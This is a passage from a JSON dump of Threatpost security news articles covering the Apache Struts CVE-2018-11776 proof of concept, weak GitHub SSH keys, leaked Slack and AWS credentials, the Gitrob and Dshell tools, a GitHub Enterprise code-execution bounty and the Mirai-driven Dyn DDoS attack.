([CVE-2018-11776](<https://access.redhat.com/security/cve/cve-2018-11776>)), [identified earlier this week](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>), could allow an adversary to execute remote code on targeted systems.\n\nOn Friday, proof-of-concept code was [released](<https://github.com/jas502n/St2-057>) on GitHub along with a [Python script](<https://github.com/pr4jwal/quick-scripts/blob/master/s2-057.py>) that allows for easy exploitation, according to Allan Liska, senior security architect with Recorded Future.\n\n\u201c[We have] also detected chatter in a number of Chinese and Russian underground forums around the exploitation of this vulnerability,\u201d he [wrote in a post](<https://www.recordedfuture.com/apache-struts-vulnerability-github/>).\n\nThe bug, which impacts Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16, is tied to an improper validation of input data. The Apache Software Foundation [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) the vulnerability for all supported versions of Struts 2. Users of Struts 2.3 are advised to upgrade to 2.3.35 and users of Struts 2.5 need to upgrade to 2.5.17.\n\nLiska said the Apache Struts 2 vulnerability is potentially even more damaging than a similar [2017 Apache Struts bug used to exploit Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\n\u201cUnlike that vulnerability, this one does not require any plug-ins to be present in order to exploit it, a simple well-crafted URL is enough to give an attacker access to a victim\u2019s Apache Struts installation and there is already exploit code on Github and underground forums are talking about how to exploit it. The worst part for many large organizations is that they may not even know they are vulnerable because Struts underpins a number of different systems including Oracle and Palo Alto,\u201d Liska said.\n\nThe fact that a patch is available to fix the vulnerability should give cold comfort to companies potentially impacted by the flaw.\n\n\u201cThe Equifax breach happened not because the vulnerability wasn\u2019t fixed, but because Equifax hadn\u2019t yet updated Struts to the latest version. If this is a true working PoC, then any company who hasn\u2019t had the time to update their software, will now be at even greater risk,\u201d said Oege de Moor, chief executive officer at Semmle.\n\nDe Moor said Semmle is not confirming whether the reported PoC is functional.\n\n\u201cIf it is [functioning], attackers now have a quicker way into the enterprise,\u201d de Moor wrote in a prepared statement Friday. \u201cThere is always a time lag between the announcement of a patch and a company updating its software. There are many reasons why companies can\u2019t update software like Struts immediately, as it is used for many business-critical operations. We aim to give companies a chance to stay safe by working with Apache Struts to make a coordinated disclosure.\u201d\n", "cvss3": {}, "published": "2018-08-24T22:07:17", "type": "threatpost", "title": "PoC Code Surfaces to Exploit Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T22:07:17", "id": "THREATPOST:2F30C320035805DB537579B86877517E", "href": "https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:56:47", "description": "An audit of the SSH keys associated with more than a million GitHub accounts shows that some users have weak, easily factorable keys and many more are using keys that are still vulnerable to the Debian OpenSSL bug disclosed seven years ago.\n\nThe public SSH keys that users associate with their GitHub account are visible to other users, a feature that enables users to share those keys with others. Last December researcher Ben Cox decided to collect as many of those keys as he could and see what he could find out about them. He began the project on Dec. 27 and by Jan. 9 he had collected more than 1.3 million SSH keys.\n\n\u201cI took a stab at this in 2013 but found that too many people didn\u2019t use GitHub in SSH mode and thus had no keys set. This time however (with a new program that used the events api) I found that the majority of active users had some SSH keys in there,\u201d Cox said in a blog [post](<https://blog.benjojo.co.uk/post/auditing-github-users-keys>) detailing the project.\n\nAfter collecting the keys, Cox began analyzing them. One of the things he looked at was the strength of the key, and he discovered that seven of the keys in his set were just 512 bits, and two others were 256 bits. Those key lengths are short enough to be in the range of factorization on many modern machines.\n\n\u201c512 bit keys have been known to be factorable in less than 3 days. The main example of this is the Texas Instruments calculator firmware signing key that was broken, allowing the modding community to upload any firmware that they wanted,\u201d Cox said.\n\n\u201cI tried on my own to make a 256 bit key and factor it, and the process took less than 25 minutes from having the public SSH key to the factoring of primes (on a subpar processer by today\u2019s standards, and then a few more minutes to transform those back into a SSH key that I could log into systems with. This risk isn\u2019t only real if someone had gathered together top of the line mathematicians or supercomputers worth of power, the 256 bit key I factored was factored on a i5-2400 in 25 mins.\u201d\n\nThe bigger issue, however, is that Cox found what he calls a \u201cvery large amount\u201d of SSH keys in the set that were vulnerable to the [Debian OpenSSL bug](<https://lists.debian.org/debian-security-announce/2008/msg00152.html>) from 2008. That vulnerability existed in certain versions of Debian and resulted from the fact that the OpenSSL random number generator included in those versions was predictable. That means that cryptographic keys generated with vulnerable versions could be guessable. The bug affected SSH keys, VPN keys, and DNSSEC keys, among others.\n\nCox compared the list of keys he had gleaned from GitHub to a list of keys affected by the Debian flaw and found that some of the accounts using vulnerable keys had access to some large and sensitive GitHub repositories. Some of those repositories include Yandex, the Russian search provider, Spotify, the cryptographic libraries for Python, and Python\u2019s core.\n\nCox disclosed the problem to GitHub in early March and the vulnerable keys were revoked on May 5. The other weak and low-quality keys he discovered were revoked on June 1.\n", "cvss3": {}, "published": "2015-06-03T07:37:04", "type": "threatpost", "title": "Audit of GitHub SSH Keys Finds Many Still Vulnerable to Old Debian Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-06-04T15:34:07", "id": "THREATPOST:9F1389C4D97BAD7FDE2519A42E4594E2", "href": "https://threatpost.com/audit-of-github-ssh-keys-finds-many-still-vulnerable-to-old-debian-bug/113117/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:25", "description": "Popular collaboration and communication firm Slack rushed to plugged a security hole in its platform Thursday that was leaking some of its users\u2019 private chats and files for anyone to access.\n\nSlack, a leading tool used by companies to communicate internally, was alerted by security firm Detectify Labs who discovered Slack users were unwittingly sharing sensitive company information on the dev site GitHub.\n\nGitHub, another popular service used by the developer community to collaborate on projects, was unknowingly hosting hundreds of Slack bots that contained API information (or Slack tokens) that unintentionally gave third parties access to private Slack networks and data stored on them.\n\nSlack bots are created by companies to be used on their private Slack platform. They can serve either silly or serious purposes. For example, a Slack bot could be programmed to reboot servers by a user who simply types the request \u201cSlack bot, please reboot server\u201d. Another Slack bot request might be \u201cWhat\u2019s the weather for tomorrow?\u201d\n\nOver the years, thousands of Slack bots have been created by companies to carry out these conversational instructions. Hundreds of those developers decided to share their Slack bot programming code on sites such as GitHub. The idea is, other developers might want to reuse a useful Slack bot or modify the code so the Slack bot can do something new.\n\n\u201cThese developers were proud of their creation. They wanted to share their hard work with the rest of the developer community,\u201d said Rickard Carlsson, CEO of Detectify in an interview with Threatpost.\n\nThat\u2019s where developers ran into trouble. Unbeknownst to the developers sharing their Slack bots with GitHub was the fact they were also uploading their company\u2019s unique API key or token inside the Slack bot code. That meant a third-party could remove the Slack token and use it to hack into the Slack account of the person who originally created it.\n\nWhen Detectify searched for Slack tokens left behind on GitHub it discovered that those tokens could be used to access chats, files and private message data shared among Slack developer teams.\n\nAffected, Carlsson told Threatpost, were tokens belonging to individual users but also Fortune 500 companies, payment providers, multiple internet service providers and health care providers. In one case, Detectify reported it stumbled upon everything from \u201crenowned advertising agencies that want to show what they are doing internally. University classes at some of the world\u2019s best-known schools. Newspapers sharing their bots as part of stories.\u201d\n\nIn a [blog post outlining its discovery](<https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/>) Thursday, Detectify wrote, \u201cIn the worst case scenario, these tokens can leak production database credentials, source code, files with passwords and highly sensitive information.\u201d Detectify said it discovered the flaw earlier this month.\n\nAt first, Slack acknowledged the problem, but reminded researchers at Detectify that it\u2019s the users\u2019 responsibility to not share tokens and remove them when they are no longer needed. Slack has since updated its positions on tokens, telling Detectify \u201cWe\u2019re proactively looking for tokens ourselves now, and reaching out to customers to let them know when we\u2019ve disabled tokens and where we found them. We\u2019ll deactivate these in the next batch.\u201d\n\nSlack\u2019s email sent to its customers explaining the situation can be read online [via Detectify\u2019s website](<https://labs.detectify.com/wp-content/uploads/2016/04/Screen-Shot-2016-04-28-at-14.53.38.png>). In it the company said it would seeking out tokens it believed companies did not want to share intentionally, and deactivating them. \u201cTo help protect your team\u2019s information, we\u2019re taking the precautionary step of permanently disabling the affected tokens on your behalf,\u201d it wrote.\n\nIn a separate statement made to press Slack stated: \u201cSlack is clear and specific that tokens should be treated just like passwords. We warn developers when they generate a token never to share it with other users or applications. Our customers\u2019 security is of paramount importance to us, and we will continue to improve our documentation and communications to ensure that this message is urgently expressed.\u201d\n\nDetectify\u2019s last piece of advice: \u201cNever commit credentials inside code. Ever.\u201d\n", "cvss3": {}, "published": "2016-04-30T07:25:42", "type": "threatpost", "title": "Slack Plugs Token Security Hole", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-03T13:46:42", "id": "THREATPOST:BE0A86BAF05C9501D981BE19F3BB40AC", "href": "https://threatpost.com/slack-plugs-token-security-hole/117750/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:28", "description": "The U.S. Army has released to open source an internal forensics analysis framework that the Army Research Lab has been using for some time.\n\nThe framework, known as Dshell, is a Python tool that runs on Linux and its designed to help analysts investigate compromises within their environments. The goal in open sourcing the framework is to encourage outside developers and analysts to develop and contribute their own modules, based on their experiences.\n\n\u201cOutside of government there are a wide variety of cyber threats that are similar to what we face here at ARL,\u201d William Glodek, Network Security branch chief at the Army Research Laboratory, said in a [statement](<http://www.army.mil/article/141734>).\n\n\u201cDshell can help facilitate the transition of knowledge and understanding to our partners in academia and industry who face the same problems.\u201d\n\nThe Dshell framework is available on [GitHub](<https://github.com/USArmyResearchLab/Dshell>), and Glodek said in his statement that he hopes that users in private industry and the academic community will find the framework useful and be able to contribute their own modules and help expand the framework\u2019s functionality.\n\n\u201cThe success of Dshell so far has been dependent on a limited group of motivated individuals within government. By next year it should be representative of a much larger group with much more diverse backgrounds to analyze cyber attacks that are common to us all,\u201d Glodek said.\n\nThe release of Dshell comes shortly after [Cisco released its own OpenSOC security analytics framework](<https://threatpost.com/cisco-releases-security-analytics-framework-to-open-source/109415>) on [GitHub](<https://opensoc.github.io/>) in November. That framework is designed specifically for large network environments and provides some anomaly detection and incident forensics capabilities.\n\n\u201cOpenSOC is a Big Data security analytics framework designed to consume and monitor network traffic and machine exhaust data of a data center. OpenSOC is extensible and is designed to work at a massive scale,\u201d the OpenSOC documentation says.\n", "cvss3": {}, "published": "2015-01-30T10:59:44", "type": "threatpost", "title": "Army Research Lab Releases Dshell Forensics Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-02-03T21:08:15", "id": "THREATPOST:76BC692CF25A0009598D6BE4E626ABD9", "href": "https://threatpost.com/army-research-lab-releases-dshell-forensics-framework/110766/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:53:56", "description": "GitHub recently awarded $18,000 to a researcher after he came across a bug in its GitHub Enterprise management console that could have resulted in remote code execution.\n\nThe company patched the vulnerability at the end of January, but news of the flaw didn\u2019t surface until this week when GitHub and Markus Fenske, a German independent pen-tester [disclosed it](<http://exablue.de/blog/2017-03-15-github-enterprise-remote-code-execution.html>).\n\nGitHub Enterprise is an on-premises version of GitHub.com that can be used to deploy a GitHub service on their organization\u2019s local network. The vulnerability is a combination of two bugs, Fenske told Threatpost Thursday.\n\nOne problem stems from the fact that a static value was being used to cryptographically sign the Ruby on Rails session secret for the console. The secret value is supposed to be a randomly generated per-machine value used to sign the cookie, not a static value.\n\nGitHub acknowledged on Tuesday that the static secret was only supposed to be used for testing and development, but \u201can unrelated change of file permissions prevented the intended (and randomly generated) session secret from being used.\u201d\n\n\u201cFor testing purposes they replaced it with a static value and forgot to change it back,\u201d Fenske told Threatpost. In the production environment, there was a mechanism that should have replaced it with a random value. But it did not work.\u201d\n\nWhile GitHub shouldn\u2019t have been using a static secret to sign cookies that hold session data, the other problem, Fenske says, is that session data could be serialized with Marshal. [Marshal](<https://ruby-doc.org/core-2.2.2/Marshal.html>), a library that converts collections of Ruby objects into a byte stream, has a method, .load, that can return the result of converted serialized data.\n\nAs Fenske points out, [documentation](<https://ruby-doc.org/core-2.2.0/Marshal.html#method-c-load>) around Marshal.load says to \u201cnever pass untrusted data (including user supplied input) to this method,\u201d but that\u2019s what GitHub was doing.\n\nBy knowing the secret, an attacker could have forged a cookie, deserialized by Marshal.load, and tricked GitHub into running whatever code they wanted.\n\n\u201cBecause the secret is known, you can create a valid signature and pass arbitrary data to Marshal.load, which then leads to remote code execution,\u201d Fenske said.\n\nFenske says that while he sells sugar wax for hair removal by day\u2013[seriously](<https://www.bodypil.de/ueber-uns.html>)\u2013he hacks stuff by night. He founded an IT security consulting firm, Exablue, last month which he plans to use to carry out audits, pen-testing, and \u201cthe whole range\u201d going forward. He said he was inspired to poke around GitHub Enterprise after he stumbled upon a blogpost by Taiwanese hacker Orange Tsai about [a SQL injection](<http://blog.orange.tw/2017/01/bug-bounty-github-enterprise-sql-injection.html>) he found in the platform.\n\n\u201cAbout two minutes after decoding the source and opening the first file (config.ru) of the first application (the management interface), I noticed the vulnerability,\u201d Fenske said.\n\nGitHub fixed the vulnerability on Jan. 31 when it pushed out GitHub Enterprise 2.8.7. Now the service defaults to a randomly generated session secret if the initially configured session secret is not found.\n\nIt was a fairly quick turnaround for the company; the patch came only five days after Fenske reported the issue and earned him $10,000, the highest reward the company gives out through its bug bounty program, and [a spot in its Hall of Fame](<https://bounty.github.com/researchers/iblue.html>).\n\n\u200b\u201dWorking with GitHub is really nice,\u201d Fenske said, \u201cFor a company that big, their speed is amazing.\u201d\n\nThe researcher had no idea when he submitted the bug, however, that the company was in the middle of a promotional bug bounty period. The company [announced the promotion](<https://github.com/blog/2302-bug-bounty-anniversary-promotion-bigger-bounties-in-january-and-february>), which stretched from January to February, to celebrate the third anniversary of its [bug bounty program](<https://bounty.github.com/#rules>) with HackerOne.\n\nAfter he sent a draft of his disclosure to the company this week, Fenske discovered his bug was severe enough to fetch an additional $8,000 bounty and [second place in the contest](<https://github.com/blog/2332-bug-bounty-third-anniversary-wrap-up>).\n\n\u201cI was just writing my article and sent GitHub a draft to look at, and the answer came within minutes, telling me that I can publish whatever I like and that they gave me more money,\u201dhe said, \u201cI did not know about that extra contest and was very pleasantly surprised.\u201d\n\nFenske\u2019s bug was one of three GitHub fixed in its Enterprise product to qualify for additional bug bounty money. The company also fixed two separate SAML authentication bypass bugs in the service.\n\nFenske said the latest release of GitHub Enterprise uses a secret that\u2019s 16 random bytes written in hex.\n\n\u201cI quickly calculated that cracking it will take about 469142742208 gigayears on a 8-GPU instance (for comparison: The Sun will be gone in 7.7 gigayears). I think it\u2019s secure now.\u201d\n", "cvss3": {}, "published": "2017-03-17T09:00:04", "type": "threatpost", "title": "GitHub Code Execution Bug Fetches $18,000 Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2017-03-16T23:38:35", "id": "THREATPOST:E984089A4842B564B374B807AF915A44", "href": "https://threatpost.com/github-code-execution-bug-fetches-18000-bounty/124378/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:55:19", "description": "When it comes to cloud computing, APIs more or less drive everything, but in the eyes of some researchers, existing security controls around them haven\u2019t kept pace.\n\nWhile individual components of a system can be secure, when that system gets deployed in the cloud it can often become insecure \u2013 and get worse at scale, according to Erik Peterson, a cloud technology researcher with Veracode. Peterson, who also refers to himself as a Cloud Security Weapons Manufacturer, described the \u2018Emergent Insecurity\u2019 of the cloud in a talk Wednesday at the Source Conference in Boston.\n\nEarly on in his presentation, Peterson recounted a [Chris Hoff](<https://twitter.com/Beaker>) quote that he claims sums up the concept: \u201cIf your security sucks now, you\u2019ll be pleasantly surprised by the lack of change when you move to cloud.\u201d\n\nIn particular Peterson warned about the dangers associated with API credential exposure, something which could easily lead to apps being rigged to spread malware, cloud infrastructure adapted for use in a Bitcoin mining operation, additional attacks being launched, and the most critical: the downloading of sensitive customer data.\n\n\u201cAPI access is the new equivalent to physical access,\u201d Peterson said, \u201cIf someone compromises your most sensitive API credential, it doesn\u2019t matter.\u201d\n\nAPI keys, which protect cloud metadata \u2013 information that usually includes Amazon Web Services (AWS) access credentials, and startup scripts \u2013 can often be the only thing standing between users and total compromise, he stressed.\n\nPeterson, who\u2019s researched cloud and architect solutions in AWS since 2009, warned that old, vintage software vulnerabilities can easily be leveraged for compromise.\n\nHe\u2019s seen it all: Server-side request forgery vulnerabilities, XML external entity vulnerabilities, command injection vulnerabilities, unintended proxy or intermediary vulnerabilities. Each one can lead to the unintended exposure of metadata, but when they all come together, it can result in a full stack hack, or what Peterson likens to \u201cdeath by 1,000 cuts.\u201d\n\nFor instance, he claims, if an attacker gained access to an API key they could escalate privileges. If they gained access to cloud DNS, it could reveal the private IP of the web server. If an attacker got access to an IP address, they could uncover an app that hasn\u2019t been tested. Once in, it\u2019s possible an attacker could do the worst, Peterson claims, clone the database for quiet extraction.\n\n\u201cLots of people are shuffling cloud data and not thinking of the flaws,\u201d Peterson said, \u201cthey all lead to exposing that user data, all that great info my system needs to startup.\u201d\n\nThere are ways to prevent a full stack hack, mainly through encryption, but common sense doesn\u2019t hurt either.\n\n\u201cNo more checking your API keys into GitHub,\u201d Peterson advised.\n\nAttackers often scour the service looking to exploit vulnerabilities and access cloud metadata API. Storing sensitive information like API keys there can be a quick lesson in futility. That still doesn\u2019t stop users from doing it though; a cursory search on the service for \u201cSECRET_ACCESS_KEY\u201d last year yielded 7,500 placeholder results, Peterson said.\n\nOne developer discovered 140 servers running on his Amazon Web Services account [last year](<https://it.slashdot.org/story/15/01/02/2342228/bots-scanning-github-to-steal-amazon-ec2-keys>) after a bot scanning GitHub sniffed out his Amazon Elastic Compute Cloud (EC2) keys.\n\nDevelopers should get off the old EC2 classic and lockdown their Simple Storage Service (S3) buckets, Peterson said Wednesday. If they aren\u2019t already, developers should log everything, especially API activity, he said, adding that some AWS tools, like [Cloudtrail](<https://aws.amazon.com/cloudtrail/>), which records AWS API calls, and [Netflix\u2019s Security Monkey](<https://threatpost.com/netflix-open-source-security-tools-solve-range-of-challenges/107931/>), which can be used to monitor and analyze AWS configurations, can be invaluable.\n\nInstead of trying to control change, developers should react to change, rethink their threat model and realize that lower priority software vulnerabilities, like SSRF, or XXE, can still be deadly, Peterson said.\n\n\u201cIf you have a key that an app is using ask yourself: What\u2019s the worst thing that could happen if it was compromised?\u201d Peterson asked aloud, \u201cIs there a path that leads to my entire environment getting deleted by some unknown entity?\u201d\n", "cvss3": {}, "published": "2016-05-19T14:20:22", "type": "threatpost", "title": "Protecting Cloud APIs Critical to Mitigating Total Compromise", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-05-19T18:20:22", "id": "THREATPOST:08BA9FD6E2245EA011F6C29F24929679", "href": "https://threatpost.com/protecting-cloud-apis-critical-to-mitigating-total-compromise/118197/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:57:34", "description": "Free online code repositories such as GitHub provide a valuable collaboration service for enterprise developers. But it\u2019s also a trove of potentially sensitive company and project information that\u2019s likely to warrant attention from hackers.\n\nAn application security specialist from Berlin has developed a tool he hopes can keep companies a step ahead. [Gitrob](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>) is an open source intelligence command-line tool that mines GitHub for files belonging to an organization and runs them against pre-determined patterns looking for potentially sensitive information that isn\u2019t meant for public consumption.\n\nIts developer Michael Henriksen, who does application security and code auditing for SoundCloud, says Gitrob starts off by using GitHub\u2019s public API to query a Github organization\u2019s list of public members.\n\n\u201cWhen the list of members is obtained, it queries GitHub again for each member that returns a list of their public repositories,\u201d Henriksen told Threatopst. \u201cThe contents of the repositories are never downloaded to the machine, it simply uses GitHub\u2019s API again to obtain a list of file names. When clicking on a file in the web interface to see its contents, it is fetched from GitHub\u2019s servers.\u201d\n\nHenriksen said he has built a number of Observers, which act as Gitrob plug-ins, that flag files matching certain patterns. Organization members, repositories and files are saved to a PostgreSQL database for analysis before a Sinatra webserver is started locally in order to serve a web app that presents the data for analysis, which must be conducted manually.\n\n\u201cAll the files are sent through these observers, one by one, and the observers can then decorate or make changes to the file\u2019s database record, before it is saved to the database,\u201d Henriksen said. \u201cRight now, Gitrob actually only contains one observer which will flag files that match [patterns of interesting files](<https://github.com/michenriksen/gitrob/blob/master/patterns.json>), but the design makes it easy to introduce new logic to look for other things. The patterns are built in to the tool itself.\u201d\n\nSecurity analysts inside an enterprise should feel at home using Gitrob, Henriksen said, but cautioned that the tool will point out a default set of potentially sensitive items. An analyst would have to manually comb through them to determine whether those files should be public.\n\n> OSINT #Gitrob mines GitHub for sensitive information that isn\u2019t meant for public consumption.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fgitrob-combs-github-repositories-for-secret-company-data%2F110380%2F&text=OSINT+%23Gitrob+mines+GitHub+for+sensitive+information+that+isn%26%238217%3Bt+meant+for+public+consumption.>)\n\n\u201cA security team in an organization can use Gitrob to periodically scan their repositories for sensitive files that might be checked in,\u201d Henriksen said. \u201cThe current version is not really suitable to run in an automated fashion, so it would have to be run manually, but I am planning to change that in the future so that it can be run automatically and report to somewhere when new things are found.\u201d\n\nHenriksen said he tested Gitrob against a number of GitHub repositories belonging to companies of different sizes; he found a variety of information using Gitrob from username-password combinations, email addresses, internal system mappings and other information that could be used in phishing campaigns or other social engineering attacks. Henriksen said he notified affected organizations; most were appreciative he said.\n\n\u201cI am not aware of any tool that specifically targets GitHub organizations like Gitrob does,\u201d Henriksen said. \u201cPeople have been finding sensitive files with GitHub\u2019s search functionality for a while (kind of like Google dorks for Github), but I think Gitrob is the first tool that makes the task of finding sensitive files within an organization very easy.\u201d\n\nInstallation instructions and requirements can be found on [his Github page](<http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/>).\n\n[_Image courtesy othree._](<https://www.flickr.com/photos/othree/>)\n", "cvss3": {}, "published": "2015-01-13T12:55:07", "type": "threatpost", "title": "Gitrob Combs Github Repositories for Secret Company Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2015-01-16T13:26:31", "id": "THREATPOST:BFFC84BE9B4393A9F11FFBECEC203286", "href": "https://threatpost.com/gitrob-combs-github-repositories-for-secret-company-data/110380/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:59:06", "description": "Amazon Web Services is actively searching a number of sources, including code repositories and application stores, looking for exposed credentials that could put users\u2019 accounts and services at risk.\n\nA week ago, a security consultant in Australia said that as many as 10,000 secret Amazon Web Services keys could be found on Github through a simple search. And yesterday, a software developer reported receiving a notice from Amazon that his credentials were discovered on Google Play in an Android application he had built.\n\nRaj Bala printed a [copy of the notice](<http://blog.rajbala.com/post/81038397871/amazon-is-downloading-apps-from-google-play-and>) he received from Amazon pointing out that the app was not built in line with Amazon\u2019s recommended best practices because he had embedded his AWS Key ID (AKID) and AWS Secret Key in the app.\n\n\u201cThis exposure of your AWS credentials within a publicly available Android application could lead to unauthorized use of AWS services, associated excessive charges for your AWS account, and potentially unauthorized access to your data or the data of your application\u2019s users,\u201d Amazon told Baj.\n\nAmazon advises users who have inadvertently exposed their credentials to invalidate them and never distribute long-term AWS keys with an app. Instead, Amazon recommends requesting temporary security credentials.\n\nRich Mogull, founder of consultancy Securosis, said this is a big deal.\n\n\u201cAmazon is being proactive and scanning common sources of account credentials, and then notifying customers,\u201d Mogull said. \u201cThey don\u2019t have to do this, especially since it potentially reduces their income.\u201d\n\nMogull knows of what he speaks. Not long ago, he received a similar notice from Amazon regarding his AWS account, only his warning was a bit more dire\u2014his credentials had been exposed on Gitbub and someone had fired up unauthorized EC2 instances in his account.\n\nMogull wrote an [extensive description of the incident](<https://securosis.com/blog/my-500-cloud-security-screwup>) on the Securosis blog explaining how he was building a proof-of-concept for a conference presentation, storing it on Github, and was done in because a test file he was using against blocks of code contained his Access Key and Secret Key in a comment line.\n\nTurns out someone was using the additional 10 EC2 instances to do some Bitcoin mining and the incident cost Mogull $500 in accumulated charges.\n\nAmazon told an Australian publication that it will continue its efforts to seek out these exposed credentials on third-party sites such as Google Play and Github.\n\n\u201cTo help protect our customers, we operate continuous fraud monitoring processes and alert customers if we find unusual activity,\u201d _[iTnews](<http://www.itnews.com.au/News/381432,aws-admits-scanning-android-app-in-secret-key-hunt.aspx>) _quoted Amazon.\n\nSaid Mogull: \u201cIt isn\u2019t often we see a service provider protecting their customers from error by extending security beyond the provider\u2019s service itself. Very cool.\u201d\n", "cvss3": {}, "published": "2014-04-02T15:01:53", "type": "threatpost", "title": "Amazon Web Services Combing Third Parties for Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2014-04-04T19:14:11", "id": "THREATPOST:3DB647F38E79C8BDF5846F520D041C7C", "href": "https://threatpost.com/amazon-web-services-combing-third-parties-for-exposed-credentials/105217/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-10-06T22:54:34", "description": "**Update **DNS provider Dyn has confirmed two massive distributed denial of service attacks against its servers Friday impacting many of its customers including Twitter, Spotify and GitHub. The attacks came in two waves, one early Friday morning and a second just a few hours later.\n\n\u201cThis attack is mainly impacting U.S. East and is impacting Managed DNS customers in this region. Our engineers are continuing to work on mitigating this issue,\u201d according to a [statement by the company to customers](<https://www.dynstatus.com/>).\n\nAs of 5:30 p.m. EDT Dyn was still reporting it was investigating and mitigating several DDoS attacks against its domain name servers.\n\nIt\u2019s unclear how many sites have been impacted. For hours Friday morning many popular sites appeared to be experiencing outages or extremely sluggish performance including Twitter, Etsy, Github, SoundCloud, Spotify, Heroku, PagerDuty and Shopify. Dyn representatives would not confirm if each one of these outages was tied to the DDoS attack.\n\nBoth the Department of Homeland Security and the Federal Bureau of Investigation said they were monitoring the attacks. Gillian Christensen, acting deputy press secretary for DHS said in a statement: \u201cDHS and FBI are aware and are investigating all potential causes.\u201d\n\nManchester, New Hampshire-based Dyn said it first began monitoring the DDoS attack at 7:10 a.m. EDT Friday. The company said in a statement to customers:\n\n> \u201cStarting at 11:10 UTC on October 21th-Friday 2016 we began monitoring and mitigating a DDoS attack against our Dyn Managed DNS infrastructure. Some customers may experience increased DNS query latency and delayed zone propagation during this time. Updates will be posted as information becomes available.\u201d\n\nDyn said at 9:36 a.m. EDT, its services were restored and many of its affected customers, including Twitter, were back online. However, at 11:52 a.m. (EDT) Dyn updated its network status reporting an additional attack impacting its managed DNS infrastructure. Then 40 minutes later Dyn added the attacks had spread to its \u201cmanaged DNS advanced services with possible delays in monitoring.\u201d\n\nIt\u2019s unclear, at this time, the source of the DDoS attack, Dyn said.\n\nDale Drew, chief security officer for telecommunications firm Level 3 Communications said he had been monitoring the attack and the likely source were overseas hackers targeting U.S. cyber infrastructure. He added, [via a video statement posted to Periscope](<https://www.periscope.tv/w/1lPJqYjVMlZJb>), \u201cWe are seeing attacks coming from an Internet of Things botnet we have identified as Marai.\u201d\n\nSecurity firm Flashpoint also identified Marai as the likely culprit in the attack.\n\nThe Mirai malware continues to recruit vulnerable IoT devices into botnets [at a record pace](<https://threatpost.com/mirai-bots-more-than-double-since-source-code-release/121368/>), one that\u2019s only gone up since the source code for Mirai was made [public two weeks ago](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>), according to Level 3.\n\nCraig Young, principle security researcher at Tripwire said the attack has telltale signs of an IoT-based DDoS attack similar to ones experienced by [Krebs on Security](<https://threatpost.com/iot-botnets-are-the-new-normal-of-ddos-attacks/121093/>) in September. In those attacks, hackers also used Mirai malware to compromise IoT devices to launch DDoS attacks.\n\n\u201cWe are seeing an increase in the number of high-intensity attacks that leverage compromised consumer DVRs and cameras. Without being able to analyze the source of Dyn\u2019s traffic it\u2019s impossible to know for sure. But what we are already seeing today, in terms IoT-based attacks, is the tip of the iceberg,\u201d Young said.\n\nRequests to Dyn for information on the source of the attacks have not been returned.\n\nYoung said that security experts have seen an increase in DDoS extortion attempts. However, he points out, many have been hoaxes and when companies didn\u2019t pay up nothing happened.\n\nForeScout CEO, Michael DeCesare said that attacks, such as the ones carried out Friday, are exasperated by the lack of security in IoT devices.\n\n\u201cThese attackers can now recruit an army of IoT devices to launch a wide scale DDoS attack due to the volume of these devices and their ease of infiltration,\u201d DeCesare said in a prepared statement regarding Friday\u2019s attacks.\n\n\u201cThe question corporations should be asking themselves is whether or not their devices are being exploited as part of these attacks. The solution starts with visibility \u2013 you cannot secure what you cannot see,\u201d he said.\n\n[![Level3 live outage map on Friday 9:50 AM \$ET\$](https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232928/Threatpost_Level3_outage_map.jpg>)\n\nLevel3 live outage map on Friday 9:50 AM (EDT)\n\n[![screen-shot-2016-10-21-at-5-18-29-pm](https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM-1024x605.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/10/06232859/Screen-Shot-2016-10-21-at-5.18.29-PM.png>)\n\nLevel3 live outage map on Friday 5:20 PM (EDT)\n\n_This article was updated Oct. 21 at 5:30 p.m. with new information from the Department of Homeland Security, new information tying the attacks to Mirai malware and quotes from both Level 3 Communications and ForeScout. \n_\n", "cvss3": {}, "published": "2016-10-21T10:01:14", "type": "threatpost", "title": "DYN Confirms DDoS Attack Knocking Out Twitter, Spotify Other Major Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2016-10-21T21:37:20", "id": 